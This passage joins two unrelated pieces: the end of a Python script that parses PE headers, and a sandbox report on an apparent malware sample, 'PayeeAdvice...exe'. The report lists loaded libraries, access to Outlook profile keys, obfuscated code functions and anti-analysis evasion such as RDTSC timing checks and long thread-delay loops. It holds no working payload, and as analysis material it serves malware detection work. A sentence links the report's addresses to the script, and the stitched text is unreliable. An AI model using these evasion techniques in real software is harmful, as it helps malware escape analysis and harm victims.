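    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x1000, 0x400,
                       0, 0, 0, 0, 0x60000020)               # CODE | EXECUTE | READ
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    info = parse_pe_headers(build_sample_pe())
    print(", ".join(info["characteristics"]))
    for name, flags in info["sections"]:
        print(f"Section: {name} {', '.join(flags)}")
    print(f"entry point VA: {info['entry_point_va']:#010x}, rebasable: {info['rebasable']}")
```

Run against a real file by passing `open(path, "rb").read()` to `parse_pe_headers`; a 32-bit image that reports RELOCS_STRIPPED and `rebasable: False` will have its code at the same addresses in every run, which is what makes the 0_2_0040xxxx function addresses in this report directly usable as breakpoints in a debugger.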
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PayeeAdvice_HK54912_R0038704_37504.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File read: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe" Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000000.00000002.1876669136.000000000439B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1875584401.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 7156, type: MEMORYSTR
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_73401B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_73401B63
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_73402FD0 push eax; ret 0_2_73402FFE
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439FCA9 push FFFFFF8Dh; iretd 0_2_0439FCAD
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439E2F8 pushfd ; iretd 0_2_0439E2FB
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439E0D1 push ebx; ret 0_2_0439E0D2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439D321 push ds; retf 0_2_0439D328
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439F31A push edx; iretd 0_2_0439F31B
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_0439D7F2 push edx; ret 0_2_0439D7F3
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00119C30 push esp; retf 0018h 2_2_00119D55
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011B4C7 push dword ptr [ebp+ecx-75h]; retf 2_2_0011B4D2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_0011B539 push dword ptr [ebp+ebx-75h]; iretd 2_2_0011B53D
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF7C7D push esp; iretd 2_2_02EF7CBE
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_02EF3D30 push 00000039h; retf 2_2_02EF3D32
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4AE29 push ds; ret 2_2_36C4AE2A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4AE31 push ds; ret 2_2_36C4AE32
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4F781 push ecx; ret 2_2_36C4F782
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C4F77D push ecx; ret 2_2_36C4F77E
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C49CD7 push ss; ret 2_2_36C49CDA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C494E7 push cs; ret 2_2_36C494EA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C489C0 push es; ret 2_2_36C489C2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C48928 push es; ret 2_2_36C4892A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB660B pushad ; retf 2_2_36CB660E
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB6609 pushad ; retf 2_2_36CB660A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB6603 pushad ; retf 2_2_36CB6606
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB0023 push esp; ret 2_2_36CB0036
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB0DE0 pushad ; ret 2_2_36CB0DE2
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB65FB pushad ; retf 2_2_36CB6602
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CBDDF3 pushfd ; rep ret 2_2_36CBDDF5
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1B91 push 68B836C3h; ret 2_2_36CB1B9A
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CB1703 push esp; ret 2_2_36CB1705
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36CF637B push ebp; retf 0036h 2_2_36CF6382
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36D35ED5 push edi; iretd 2_2_36D35ED6
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe File created: C:\Users\user\AppData\Local\Temp\nsj38E6.tmp\System.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API/Special instruction interceptor: Address: 43B0B34
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API/Special instruction interceptor: Address: 2EF0B34
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe RDTSC instruction interceptor: First address: 434344B second address: 434344B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F12E933F167h 0x00000006 cld 0x00000007 inc ebp 0x00000008 inc ebx 0x00000009 cmp dl, al 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe RDTSC instruction interceptor: First address: 2E8344B second address: 2E8344B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F12E87D71D7h 0x00000006 cld 0x00000007 inc ebp 0x00000008 inc ebx 0x00000009 cmp dl, al 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: 110000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: 339C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Memory allocated: 359C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599322
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599218
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598999
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597797
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597687
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597567
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597453
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597343
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597234
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597125
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 597015
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596906
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596796
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596687
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596578
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596468
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596359
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596250
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596140
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 596031
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595922
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595797
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595687
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595468
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595359
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595248
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595140
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 595031
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594921
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594812
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594670
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Thread delayed: delay time: 594562
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Window / User API: threadDelayed 7667
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Window / User API: threadDelayed 2187
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj38E6.tmp\System.dll
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe API coverage: 2.3 %
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep count: 33 > 30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5304 Thread sleep count: 7667 > 30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 5304 Thread sleep count: 2187 > 30
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599322s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598999s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597567s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597343s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597234s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -597015s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596906s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596796s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596578s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596468s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596359s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596250s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596140s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -596031s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595922s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595797s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595248s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594921s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594670s >= -30000s
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe TID: 4476 Thread sleep time: -594562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
